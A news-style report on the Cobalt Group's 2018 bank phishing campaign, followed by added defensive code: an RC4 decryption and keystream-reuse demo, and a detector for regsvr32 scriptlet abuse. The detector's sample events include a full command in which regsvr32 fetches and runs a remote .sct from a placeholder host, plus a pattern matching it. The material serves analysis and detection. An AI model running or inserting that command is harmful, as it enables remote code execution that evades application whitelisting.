Cobalt group still active despite losing its ringleader.
Cobalt Group, the hacking group behind widespread attacks on banks and ATM jackpotting campaigns across Europe, is still active despite the arrest of its accused ringleader in March. The group first gained notoriety in 2016, when it stole the equivalent of over $32,000 from six ATMs in Eastern Europe in a single night. Throughout 2017 it expanded its focus to financial-sector phishing and to new regions, including North and South America as well as Western Europe. Researchers estimate that in the first six months of 2017 alone Cobalt sent phishing messages with malicious attachments to over 3,000 users at 250 companies in 13 countries. The report is notable because the Spanish National Police arrested the Cobalt Group's leader on March 26. EUROPOL said the individual was responsible for helping to attack 100 financial institutions worldwide and causing more than 1 billion EUR in damages.
In a report released last week, researchers said that in mid-May 2018 they detected a phishing campaign directed at the financial sector whose ultimate goal is to download a JavaScript backdoor onto victims' computers. The backdoor carries a set of malicious functions: cyberespionage, launching programs, updating itself, removing itself, and detecting antivirus software. It encrypts its communications with the C2 server using RC4, a symmetric stream cipher, so a key recovered from a sample decrypts captured traffic in both directions. Its capabilities mirror those of the backdoor Cobalt Group has been known to employ in the past.
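The article only names the cipher, so here is an added example (not code from the report or from the group's backdoor) of what RC4-protected C2 traffic means in practice for an analyst. The key and the two beacon messages are constructed placeholders; the `rc4` function is the standard algorithm and is checked against a published test vector. The second function shows the failure mode a static RC4 key without a per-message nonce creates: two beacons share the same keystream, so one known plaintext recovers the other without the key at all.

```python
"""RC4 as used for C2 encryption, plus the keystream-reuse weakness of a static key.

Added example with constructed data; the key and beacons are not real samples.
"""


def rc4(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt with RC4 (symmetric: the same call serves both directions)."""
    # Key-scheduling algorithm: permute S using the key bytes
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm: XOR each data byte with a keystream byte
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def recover_with_known_plaintext(c_known: bytes, p_known: bytes, c_unknown: bytes) -> bytes:
    """Keystream reuse: two messages under the same RC4 key with no nonce share the
    keystream, so c1 XOR c2 == p1 XOR p2. A known p1 therefore yields the prefix of p2
    (up to the length of p1) without ever touching the key."""
    return xor_bytes(xor_bytes(c_known, c_unknown), p_known)


# Constructed placeholders: a hypothetical static key hard-coded in a sample, and two
# beacons a backdoor might send. Not real traffic.
STATIC_KEY = b"hypothetical-c2-key"
BEACON_1 = b'{"id":"host-a","cmd":"av","res":"Windows Defender"}'
BEACON_2 = b'{"id":"host-a","cmd":"run","res":"started notepad"}'


def decrypt_beacon(ciphertext: bytes, key: bytes = STATIC_KEY) -> bytes:
    """What an analyst does once the key is pulled from the sample: RC4 the capture."""
    return rc4(key, ciphertext)


if __name__ == "__main__":
    c1 = rc4(STATIC_KEY, BEACON_1)
    c2 = rc4(STATIC_KEY, BEACON_2)
    print("decrypted with key:   ", decrypt_beacon(c1))
    print("recovered without key:", recover_with_known_plaintext(c1, BEACON_1, c2))
```

The `rc4(b"Key", b"Plaintext")` test vector (`bbf316e8d940af0ad3`) is the usual sanity check before trusting a hand-written implementation on real captures; the known-plaintext recovery only works because nothing (no nonce, no key rotation) changes the keystream between messages, which is exactly the situation a hard-coded key in a backdoor produces.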
Cobalt usually uses a number of techniques to evade user suspicion and spam filters. The group hacks poorly protected public sites, which it uses to host malware. It sends fake messages that appear to come from financial regulators and company partners, and targets both work and personal addresses of employees. In most cases, the goal of the phishing messages is to compromise the bank systems used for ATM management. This enables infecting ATMs with malware that takes control of the cash dispenser. During the final stage of the attack, mules collect cash from the hacked ATMs.

The new May attacks carry all of the group's hallmarks beyond just the payload. For one, the phony messages were sent from a domain whose structure is identical to those previously used by the hacking group. These messages also contain a link that points to a malicious document weaponized with three exploits for remote code execution in Microsoft Word, generated by the ThreadKit exploit kit. This kill chain is the same as that of a Cobalt Group campaign detected in February.
Cobalt relies on social engineering for the first stage of its attacks, since almost 30 percent of recipients click links in phishing messages, and the hackers are able to draw employees, including security staff, into correspondence. If a message is sent from the address of a real company, the success rate jumps to 33 percent. Researchers think that once one of the exploits is triggered, a BAT script runs that launches regsvr32.exe, a legitimate Microsoft-signed Windows utility that can be abused to bypass AppLocker by downloading and running SCT scriptlets or COM objects from a remote location. The utility in turn downloads the COM-DLL-Dropper, which then fetches the backdoor.
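The chain above (Word exploit, BAT script, regsvr32.exe pulling a remote SCT) leaves a very recognisable trace in process-creation telemetry. The following is an added example, not code from the report or from any vendor product, of the triage logic a detection engineer would write over such events: it flags regsvr32.exe invoked with `scrobj.dll` or with a `/i:` argument that is a URL or a `.sct` file, and raises the severity when an Office application sits in the parent chain. The events, paths, PIDs and the `example.invalid` host are all constructed placeholders.

```python
"""Flag regsvr32.exe scriptlet (SCT) abuse in process-creation telemetry.

Added example. The events below are constructed, not real logs; the field layout
(pid, ppid, image path, command line) mirrors what Sysmon-style process-creation
events carry but is not tied to any product's schema.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# "/i:<arg>" where <arg> is a URL or ends in .sct: the scriptlet-install form of regsvr32
SCT_INSTALL_ARG = re.compile(r"/i:\S*?(?:https?://|\.sct\b)", re.IGNORECASE)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the executable
    cmdline: str


def is_regsvr32_sct_abuse(ev: ProcEvent) -> bool:
    """True when regsvr32.exe is asked to load scrobj.dll or a URL/.sct via /i:."""
    if ntpath.basename(ev.image).lower() != "regsvr32.exe":
        return False
    cl = ev.cmdline.lower()
    return "scrobj.dll" in cl or bool(SCT_INSTALL_ARG.search(ev.cmdline))


def office_ancestor(ev: ProcEvent, by_pid: Dict[int, ProcEvent],
                    max_depth: int = 5) -> Optional[str]:
    """Walk the parent chain and return the first Office image found, if any.

    The BAT stage means the Office process is usually the grandparent (via cmd.exe),
    so a direct-parent check alone would miss this chain."""
    cur = ev
    for _ in range(max_depth):
        parent = by_pid.get(cur.ppid)
        if parent is None:
            return None
        name = ntpath.basename(parent.image).lower()
        if name in OFFICE_APPS:
            return name
        cur = parent
    return None


def triage(events: List[ProcEvent]) -> Dict[int, str]:
    """Map each suspicious regsvr32 PID to a severity: 'high' if spawned under an
    Office application, 'medium' otherwise. Benign regsvr32 use is not returned."""
    by_pid = {e.pid: e for e in events}
    verdicts: Dict[int, str] = {}
    for ev in events:
        if not is_regsvr32_sct_abuse(ev):
            continue
        verdicts[ev.pid] = "high" if office_ancestor(ev, by_pid) else "medium"
    return verdicts


# Constructed sample events: one Word -> cmd.exe -> regsvr32 chain, one legitimate
# DLL registration, and one local .sct load with no Office ancestor.
SAMPLE_EVENTS = [
    ProcEvent(1000, 800, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r'"WINWORD.EXE" /n "C:\Users\user\Downloads\invoice.doc"'),
    ProcEvent(1010, 1000, r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c C:\Users\user\AppData\Local\Temp\run.bat"),
    ProcEvent(1020, 1010, r"C:\Windows\System32\regsvr32.exe",
              r"regsvr32.exe /s /n /u /i:http://example.invalid/payload.sct scrobj.dll"),
    ProcEvent(2000, 900, r"C:\Windows\System32\regsvr32.exe",
              r"regsvr32.exe /s C:\Program Files\Vendor\component.dll"),
    ProcEvent(3000, 900, r"C:\Windows\System32\regsvr32.exe",
              r"regsvr32.exe /s /i:C:\Temp\x.sct scrobj.dll"),
]


if __name__ == "__main__":
    for pid, severity in triage(SAMPLE_EVENTS).items():
        print(f"pid {pid}: {severity}")
```

Keying on the argument shape rather than on the exact URL keeps the rule useful when the hosting site changes, which the article notes the group does routinely by compromising fresh public sites; the Office-ancestry walk is what separates this phishing chain from an administrator registering a legitimate COM component.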